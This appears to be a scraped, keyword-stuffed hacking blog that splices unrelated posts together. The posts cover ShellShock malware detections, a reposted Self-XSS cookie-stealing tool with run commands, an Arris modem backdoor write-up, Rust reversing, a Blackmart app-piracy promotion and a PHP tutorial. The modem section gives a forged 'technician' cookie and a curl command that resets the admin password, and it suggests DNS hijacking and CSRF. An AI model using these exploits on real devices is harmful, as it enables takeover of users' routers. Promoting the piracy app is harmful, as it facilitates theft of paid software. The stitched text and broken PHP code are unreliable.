Thursday, May 21, 2020

ShellShock Payload Sample Linux.Bashlet



Someone kindly shared their sample of the shellshock malware described by the Malware Must die group - you can read their analysis here:

File: fu4k_2485040231A35B7A465361FAF92A512D
Size: 152
MD5: 2485040231A35B7A465361FAF92A512


VIrustotal

SHA256: e74b2ed6b8b005d6c2eea4c761a2565cde9aab81d5005ed86f45ebf5089add81
File name: trzA114.tmp
Detection ratio: 22 / 55
Analysis date: 2014-10-02 05:12:29 UTC ( 6 hours, 50 minutes ago )
Antivirus Result Update
Ad-Aware Linux.Backdoor.H 20141002
Avast ELF:Shellshock-A [Expl] 20141002
Avira Linux/Small.152.A 20141002
BitDefender Linux.Backdoor.H 20141002
DrWeb Linux.BackDoor.Shellshock.2 20141002
ESET-NOD32 Linux/Agent.AB 20141002
Emsisoft Linux.Backdoor.H (B) 20141002
F-Secure Linux.Backdoor.H 20141001
Fortinet Linux/Small.CU!tr 20141002
GData Linux.Backdoor.H 20141002
Ikarus Backdoor.Linux.Small 20141002
K7AntiVirus Trojan ( 0001140e1 ) 20141001
K7GW Trojan ( 0001140e1 ) 20141001
Kaspersky Backdoor.Linux.Small.cu 20141001
MicroWorld-eScan Linux.Backdoor.H 20141002
Qihoo-360 Trojan.Generic 20141002
Sophos Linux/Bdoor-BGG 20141002
Symantec Linux.Bashlet 20141002
Tencent Win32.Trojan.Gen.Vdat 20141002
TrendMicro ELF_BASHLET.A 20141002
TrendMicro-HouseCall ELF_BASHLET.A 20141002
nProtect Linux.Backdoor.H 20141001

Related word


  1. Hacking Games Online
  2. Significado Hacker
  3. Funnel Hacking Live
  4. Cracker Definicion
  5. Aprender Hacking Desde Cero
  6. Hacking Tor Whatsapp
  7. Body Hacking
  8. Best Hacking Games
  9. Hacking Quotes
  10. Hacking Software
  11. Hacking Games Online
  12. Ethical Hacking
  13. Growth Hacking Instagram
  14. Udemy Hacking
  15. Hacking Pages

Self-XSS - Self-XSS Attack Using Bit.Ly To Grab Cookies Tricking Users Into Running Malicious Code


Self-XSS attack using bit.ly to grab cookies tricking users into running malicious code

How it works?
Self-XSS is a social engineering attack used to gain control of victims' web accounts by tricking users into copying and pasting malicious content into their browsers. Since Web browser vendors and web sites have taken steps to mitigate this attack by blocking pasting javascript tag, I figure out a way of doing that using Bit.ly, so we can create a redirect pointing to "website.com/javascript:malicious_code". If the user is tricked to run the javascript code after "website.com/" the cookies of its authenticated/logged session of website.com will be sent to the attacker.


Features:
Port Forwarding using Ngrok and shortner using Bitly.com (Register for free)

Requirement
https://bitly.com account (Register for free)

Legal disclaimer:
Usage of Self-XSS for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

Usage:
git clone https://github.com/thelinuxchoice/self-xss
cd self-xss
bash self-xss.sh

Author: https://github.com/thelinuxchoice/self-xss
Twitter: https://twitter.com/linux_choice




via KitPloit

More information


  1. Ethical Hacking
  2. Best Hacking Books
  3. Como Hacker
  4. Certificacion Ethical Hacking
  5. Hacking Attacks
  6. Manual Del Hacker
  7. Hacking To The Gate

Fragroute


"fragroute intercepts, modifies, and rewrites egress traffic destined for a specified host, implementing most of the attacks described in the Secure Networks "Insertion, Evasion, and Denial of Service: Eluding Network Intrusion Detection" paper of January 1998. It features a simple ruleset language to delay, duplicate, drop, fragment, overlap, print, reorder, segment, source-route, or otherwise monkey with all outbound packets destined for a target host, with minimal support for randomized or probabilistic behaviour. This tool was written in good faith to aid in the testing of network intrusion detection systems, firewalls, and basic TCP/IP stack behaviour." read more...

Website: http://monkey.org/~dugsong/fragroute

More information

Arris Cable Modem Backdoor - I'm A Technician, Trust Me.

Vendor backdoors are the worst. Sloppy coding leading to unintentional "bugdoors" is somewhat defendable, but flat out backdoors are always unacceptable. Todays example is brought to you by Arris. A great quote from their site -
Subscribers want their internet to be two things, fast and worry free. Cable operators deploy services to meet the speed expectations, and trust ARRIS to provide the cable modems that deliver the reliability.
Nothing spells "trust" and "worry free" like a backdoor account, right?! Anyways, the following was observed on an Arris TG862G cable modem running the following firmware version -TS070563_092012_MODEL_862_GW

After successfully providing the correct login and password to the modems administration page, the following cookie is set (client side):
Cookie: credential=eyJ2YWxpZCI6dHJ1ZSwidGVjaG5pY2lhbiI6ZmFsc2UsImNyZWRlbnRpYWwiOiJZV1J0YVc0NmNHRnpjM2R2Y21RPSIsInByaW1hcnlPbmx5IjpmYWxzZSwiYWNjZXNzIjp7IkFMTCI6dHJ1ZX0sIm5hbWUiOiJhZG1pbiJ9
 All requests must have a valid "credential" cookie set (this was not the case in a previous FW release - whoops) if the cookie is not present the modem will reply with "PLEASE LOGIN". The cookie value is just a base64 encoded json object:
{"valid":true,"technician":false,"credential":"YWRtaW46cGFzc3dvcmQ=","primaryOnly":false,"access":{"ALL":true},"name":"admin"}
And after base64 decoding the "credential" value we get:
{"valid":true,"technician":false,"credential":"admin:password","primaryOnly":false,"access":{"ALL":true},"name":"admin"}
Sweet, the device is sending your credentials on every authenticated request (without HTTPS), essentially they have created basic-auth 2.0 - As the kids say "YOLO". The part that stuck out to me is the "technician" value that is set to "false" - swapping it to "true" didn't do anything exciting, but after messing around a bit I found that the following worked wonderfully:
Cookie: credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9
Which decodes to the following:
{"credential":"dGVjaG5pY2lhbjo="}
And finally:
{"credential":"technician:"} 
Awesome, the username is "technician" and the password is empty. Trying to log into the interface using these credentials does not work :(




That is fairly odd. I can't think of a reasonable reason for a hidden account that is unable to log into the UI. So what exactly can you do with this account? Well, the web application is basically a html/js wrapper to some CGI that gets/sets SNMP values on the modem. It is worth noting that on previous FW revisions the CGI calls did NOT require any authentication and could be called without providing a valid "credential" cookie. That bug was killed a few years ago at HOPE 9.

Now we can resurrect the ability to set/get SNMP values by setting our "technician" account:


That's neat, but we would much rather be using the a fancy "web 2.0" UI that a normal user is accustomed to, instead of manually setting SNMP values like some sort of neckbearded unix admin. Taking a look at the password change functionality appeared to be a dead end as it requires the previous password to set a new one:


Surprisingly the application does check the value of the old password too! Back to digging around the following was observed in the "mib.js" file:
SysCfg.AdminPassword= new Scalar("AdminPassword","1.3.6.1.4.1.4115.1.20.1.1.5.1",4);
Appears that the OID "1.3.6.1.4.1.4115.1.20.1.1.5.1" holds the value of the "Admin" password! Using the "technician" account to get/walk this OID comes up with nothing:
HTTP/1.1 200 OK
Date: Tue, 23 Sep 2014 19:58:40 GMT
Server: lighttpd/1.4.26-devel-5842M
Content-Length: 55
{
"1.3.6.1.4.1.4115.1.20.1.1.5.1.0":"",
"1":"Finish"
}
What about setting a new value? Surely that will not work....



That response looks hopeful. We can now log in with the password "krad_password" for the "admin" user:


This functionality can be wrapped up in the following curl command:
curl -isk -X 'GET' -b 'credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9' 'http://192.168.100.1:8080/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.5.1.0=krad_password;4;'
Of course if you change the password you wouldn't be very sneaky, a better approach would be re-configuring the modems DNS settings perhaps? It's also worth noting that the SNMP set/get is CSRF'able if you were to catch a user who had recently logged into their modem.

The real pain here is that Arris keeps their FW locked up tightly and only allows Cable operators to download revisions/fixes/updates, so you are at the mercy of your Cable operator, even if Arris decides that its worth the time and effort to patch this bug backdoor - you as the end user CANNOT update your device because the interface doesn't provide that functionality to you! Next level engineering.


Read more


  1. Hacking Con Buscadores
  2. Curso De Ciberseguridad Y Hacking Ético
  3. Hacking Xbox One
  4. Sean Ellis Growth Hacking
  5. Hacking Wifi Windows
  6. Hacking Course
  7. Defcon Hacking
  8. Growth Hacking Marketing
  9. Programa De Hacking
  10. Grey Hat Hacking
  11. Libros Hacking
  12. Nivel Basico
  13. Growth Hacking

Wednesday, May 20, 2020

Reversing Rust String And Str Datatypes

Lets build an app that uses several data-types in order to see how is stored from a low level perspective.

Rust string data-types

The two first main objects are "str" and String, lets check also the constructors.




Imports and functions

Even such a basic program links several libraries and occupy 2,568Kb,  it's really not using the imports and expots the runtime functions even the main. 


Even a simple string operation needs 544 functions on rust:


Main function

If you expected see a clear main function I regret to say that rust doesn't seem a real low-level language In spite of having a full control of the memory.


Ghidra turns crazy when tries to do the recursive parsing of the rust code, and finally we have the libc _start function, the endless loop after main is the way Ghidra decompiles the HLT instruction.


If we jump to main, we see a function call, the first parameter is rust_main as I named it below:



If we search "hello world" on the Defined Strings sections, matches at the end of a large string


After doing "clear code bytes" we can see the string and the reference:


We can see that the literal is stored in an non null terminated string, or most likely an array of bytes. we have a bunch of byte arrays and pointed from the code to the beginning.
Let's follow the ref.  [ctrl]+[shift]+[f] and we got the references that points to the rust main function.


After several naming thanks to the Ghidra comments that identify the rust runtime functions, the rust main looks more understandable.
See below the ref to "hello world" that is passed to the string allocated hard-coding the size, because is non-null terminated string and there is no way to size this, this also helps to the rust performance, and avoid the c/c++ problems when you forgot the write the null byte for example miscalculating the size on a memcpy.


Regarding the string object, the allocator internals will reveal the structure in static.
alloc_string function call a function that calls a function that calls a function and so on, so this is the stack (also on static using the Ghidra code comments)

1. _$LT$alloc..string..String$u20$as$u20$core..convert..From$LT$$RF$str$GT$$GT$::from::h752d6ce1f15e4125
2. alloc::str::_$LT$impl$u20$alloc..borrow..ToOwned$u20$for$u20$str$GT$::to_owned::h649c495e0f441934
3. alloc::slice::_$LT$impl$u20$alloc..borrow..ToOwned$u20$for$u20$$u5b$T$u5d$$GT$::to_owned::h1eac45d28
4. alloc::slice::_$LT$impl$u20$$u5b$T$u5d$$GT$::to_vec::h25257986b8057640
5. alloc::slice::hack::to_vec::h37a40daa915357ad
6. core::slice::_$LT$impl$u20$$u5b$T$u5d$$GT$::len::h2af5e6c76291f524
7. alloc::vec::Vec$LT$T$GT$::extend_from_slice::h190290413e8e57a2
8. _$LT$alloc..vec..Vec$LT$T$GT$$u20$as$u20$alloc..vec..SpecExtend$LT$$RF$T$C$core..slice..Iter$LT$T$GT$$GT$$GT$::spec_extend::h451c2f92a49f9caa
...


Well I'm not gonna talk about the performance impact on stack but really to program well reusing code grants the maintainability and its good, and I'm sure that the rust developed had measured that and don't compensate to hardcode directly every constructor.

At this point we have two options, check the rust source code, or try to figure out the string object in dynamic with gdb.

Source code

Let's explain this group of substructures having rust source code in the hand.
The string object is defined at string.rs and it's simply an u8 type vector.



And the definition of vector can be found at vec.rs  and is composed by a raw vector an the len which is the usize datatype.



The RawVector is a struct that helds the pointer to the null terminated string stored on an Unique object, and also contains the allocation pointer, here raw_vec.rs definition.



The cap field is the capacity of the allocation and a is the allocator:



Finally the Unique object structure contains a pointer to the null terminated string, and also a one byte marker core::marker::PhantomData



Dynamic analysis

The first parameter of the constructor is the interesting one, and in x64 arch is on RDI register, the extrange sequence RDI,RSI,RDX,RCX it sounds like ACDC with a bit of imagination (di-si-d-c)

So the RDI parámeter is the pointer to the string object:



So RDI contains the stack address pointer that points the the heap address 0x5578f030.
Remember to disable ASLR to correlate the addresses with Ghidra, there is also a plugin to do the synchronization.

Having symbols we can do:
p mystring

and we get the following structure:

String::String {
  vec: alloc::vec::Vec {
    buf: alloc::raw_vec::RawVec {
      ptr: core::ptr::unique::Unique {
        pointer: 0x555555790130 "hello world\000",
        _marker: core::marker::PhantomData
     },
     cap: 11,
     a: alloc::alloc::Global
   },
   len: 11
  }
}

If the binary was compiled with symbols we can walk the substructures in this way:

(gdb) p mystring.vec.buf.ptr
$6 = core::ptr::unique::Unique {pointer: 0x555555790130 "hello world\000", _marker: core::marker::PhantomData}

(gdb) p mystring.vec.len

$8 = 11

If we try to get the pointer of each substructure we would find out that the the pointer is the same:


If we look at this pointer, we have two dwords that are the pointer to the null terminated string, and also 0xb which is the size, this structure is a vector.


The pionter to the c string is 0x555555790130




This seems the c++ string but, let's look a bit deeper:

RawVector
  Vector:
  (gdb) x/wx 0x7fffffffdf50
  0x7fffffffdf50: 0x55790130  -> low dword c string pointer
  0x7fffffffdf54: 0x00005555  -> hight dword c string pointer
  0x7fffffffdf58: 0x0000000b  -> len

0x7fffffffdf5c: 0x00000000
0x7fffffffdf60: 0x0000000b  -> low cap (capacity)
0x7fffffffdf64: 0x00000000  -> hight cap
0x7fffffffdf68: 0xf722fe27  -> low a  (allocator)
0x7fffffffdf6c: 0x00007fff  -> hight a
0x7fffffffdf70: 0x00000005 

So in this case the whole object is in stack except the null-terminated string.




Related word
  1. Hacking Websites
  2. Hacker Significado
  3. Libro Hacker
  4. Rom Hacking Pokemon
  5. Growth Hacking Cursos

DOWNLOAD BLACKMART ANDROID APP – DOWNLOAD PLAYSTORE PAID APPS FREE

Android made endless possibilities for everyone. It introduced a platform where are millions of apps that a user can download and buy depending on their needs. You're thinking about Google PlayStore, yes I am also talking about Google PlayStore. It's categorized app collection depending on every niche of life. Few of them are free and some of them are paid. Most of the paid apps are only charges small cost in between $2 to $8, but few apps are highly costly that make cost over $50 even, which is not possible for every user to buy and get benefit from it. So, here I am sharing a really useful app, that can make every Google PlayStore app for you to download it for free. You can download any paid app that may even cost about $50. It's totally free. Download blackmart Android app and download google play store paid apps freely.

DOWNLOAD BLACKMART ANDROID APP – DOWNLOAD PLAYSTORE PAID APPS FREE

  • It's extremely easy to use.
  • It has a Multilingual option for a global user experience.
  • The app doesn't ask for any payments.
  • Capable to download full of downloadable applications.
  • Super fast in downloading and installation.

More information


  1. Escuela De Hacking
  2. Portatil Para Hacking
  3. Wargames Hacking
  4. Herramientas Growth Hacking
  5. Hacking Hardware Tools
  6. Mindset Hacking Español
  7. Hacking Growth Sean Ellis
  8. Growth Hacking Cursos
  9. Life Hacking
  10. Clases De Hacker

How To Fetch Data From The Database | Tutorial 4


Welcome to my another PHP and MYSQL tutorial. In the previous I've discussed about the data insertion into database by using PHP and MYSQL. So i did successfully in the previous video.

In this video tutorial I'll discuss How to fetch data from the database called as data fetching. It's really a simple thing to access your data which is in database. You just have to do a little work for this. For fetching data you have follow some steps.

How to Fetch Data from Database

Step 1:

Make a connection with your database which i did in the previous blog.

Step 2:

If you wanna fetching a values in "form" or in a table so just have to create a form, table or whatever you want in HTML. I've created a table where I'll show you how to fetch data in table form.

Step 3:

Write a query SELECT * FROM table_Name;

Step 4:

Create a Loop for fetching all the data on a single click. 

Step 5:

Create variables for the sake of storing a different values from the combined values in the loop variable like:

//while loop to fetch all the values from the database and stored in the variable named "row".
while($row = mysql_fetch_array(mysql_query($conn,$query))){

$name = $row['username']; //$name will save all the username values from the loop variable 'row'.
$pass = $row['password']; //$pass will save the password values from the loop variable 'row'.

}

Now watch the video for better understanding.